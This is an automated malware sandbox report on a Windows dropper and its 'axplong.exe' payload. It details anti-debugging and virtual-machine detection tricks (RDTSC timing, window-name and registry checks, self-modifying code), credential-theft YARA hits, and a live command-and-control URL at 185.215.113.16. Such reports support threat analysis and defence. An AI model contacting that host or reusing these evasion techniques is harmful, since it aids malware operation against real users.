                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110284B second address: 1102852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: F8F26F second address: F8F273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 110D93B second address: 110D95A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 110D95A second address: 110D95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 11069E7 second address: 1106A11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F2E044F25F6h 0x0000000f jmp 00007F2E044F2601h 0x00000014 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 1106A11 second address: 1106A34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F2E050A57D5h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 110CAB7 second address: 110CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 110CE10 second address: 110CE5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D2h 0x00000007 jmp 00007F2E050A57D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F2E050A57D6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 110CE5B second address: 110CE62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 110D23C second address: 110D242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 1111343 second address: 111134A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 11113BA second address: 11113C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 11113C5 second address: 11113E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 nop 0x00000007 jg 00007F2E044F25FBh 0x0000000d push 00000000h 0x0000000f cld 0x00000010 push 6A7CACACh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 jg 00007F2E044F25F6h 0x0000001e pop eax 0x0000001f rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 11113E9 second address: 11113FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CDh 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 111153E second address: 111156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 4CC5C343h 0x0000000f mov edi, 481B19A5h 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D2B3Dh] 0x0000001c push 00000000h 0x0000001e mov esi, edx 0x00000020 push 00000003h 0x00000022 cmc 0x00000023 push A1F63EA8h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c pop esi 0x0000002d rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 111156B second address: 111158B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 111158B second address: 11115B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 add dword ptr [esp], 1E09C158h 0x0000000d mov ecx, dword ptr [ebp+122D385Fh] 0x00000013 lea ebx, dword ptr [ebp+12456116h] 0x00000019 sub dword ptr [ebp+122D2748h], eax 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 11115B0 second address: 11115B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 11115B7 second address: 11115BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C903AE second address: 4C903F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2E050A57CEh 0x0000000f push eax 0x00000010 jmp 00007F2E050A57CBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edi, si 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C904D1 second address: 4C9052A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F2E044F2601h 0x00000012 pop eax 0x00000013 jmp 00007F2E044F25FEh 0x00000018 push 2DF305ABh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2E044F2603h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9052A second address: 4C9052E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9052E second address: 4C90534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90534 second address: 4C905A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E050A57D2h 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 5B03ABABh 0x00000014 pushad 0x00000015 mov bh, ah 0x00000017 call 00007F2E050A57CFh 0x0000001c mov eax, 453B743Fh 0x00000021 pop esi 0x00000022 popad 0x00000023 mov eax, dword ptr fs:[00000000h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov dx, si 0x0000002f pushfd 0x00000030 jmp 00007F2E050A57D8h 0x00000035 or esi, 2809DC58h 0x0000003b jmp 00007F2E050A57CBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C905A6 second address: 4C905E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2E044F25FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2E044F25FEh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C905E3 second address: 4C90619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B6C4h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F2E050A57CFh 0x00000012 sub esp, 1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2E050A57D5h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90619 second address: 4C90660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F2E044F25FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F2E044F25FCh 0x00000019 sbb cl, 00000038h 0x0000001c jmp 00007F2E044F25FBh 0x00000021 popfd 0x00000022 push esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90660 second address: 4C90666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90666 second address: 4C9066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F4EB59 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10F74B5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 111F662 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1188739 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: F8EB59 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 11374B5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 115F662 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 11C8739 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CE0CCA rdtsc 0_2_04CE0CCA
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1265Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 411Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1239Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1239Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8184Thread sleep time: -50025s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8168Thread sleep count: 1265 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8168Thread sleep time: -2531265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8140Thread sleep count: 411 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8140Thread sleep time: -12330000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5868Thread sleep time: -720000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8180Thread sleep count: 1239 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8180Thread sleep time: -2479239s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8164Thread sleep count: 1239 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8164Thread sleep time: -2479239s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                    Source: file.exe, 00000000.00000002.1789114447.00000000009C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: axplong.exe, 00000006.00000002.2983995234.0000000000D2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1789428838.00000000010D7000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1818397635.0000000001117000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1818466611.0000000001117000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CE0CCA rdtsc 0_2_04CE0CCA
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F5645B mov eax, dword ptr fs:[00000030h]6_2_00F5645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F5A1C2 mov eax, dword ptr fs:[00000030h]6_2_00F5A1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F3D312 cpuid 6_2_00F3D312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00F3CB1A

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 1.2.axplong.exe.f20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.axplong.exe.f20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.f20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1818369517.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1818290086.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1789336542.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1743323131.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2324424326.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1777396325.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1776904295.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory641
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520154 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 6 other signatures 2->30 6 file.exe 5 2->6         started        10 axplong.exe 2->10         started        12 axplong.exe 12 2->12         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\axplong.exe, PE32 6->18 dropped 20 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 axplong.exe 6->15         started        38 Antivirus detection for dropped file 10->38 40 Tries to detect sandboxes and other dynamic analysis tools (window names) 10->40 42 Machine Learning detection for dropped file 10->42 22 185.215.113.16, 49737, 49738, 49739 WHOLESALECONNECTIONSNL Portugal 12->22 44 Hides threads from debuggers 12->44 46 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->46 48 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->48 file5 signatures6 process7 signatures8 50 Hides threads from debuggers 15->50 52 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->52 54 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->54

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.phpom100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpm100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php&100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpi100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpSSv100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpb100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpCHIz100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpMicR100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php_RE&R100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpinb100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpN100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpO100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded)100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpY100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phptem100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpL100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpIVE100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpE100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpDri100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpPC100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpw100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpxSu100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpD;.N100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php?100%Avira URL Cloudmalware
                    http://185.215.113.16/Jo89Ku7d/index.phpndows100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpa=C100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php1100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpSy100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phprs100%Avira URL Cloudphishing
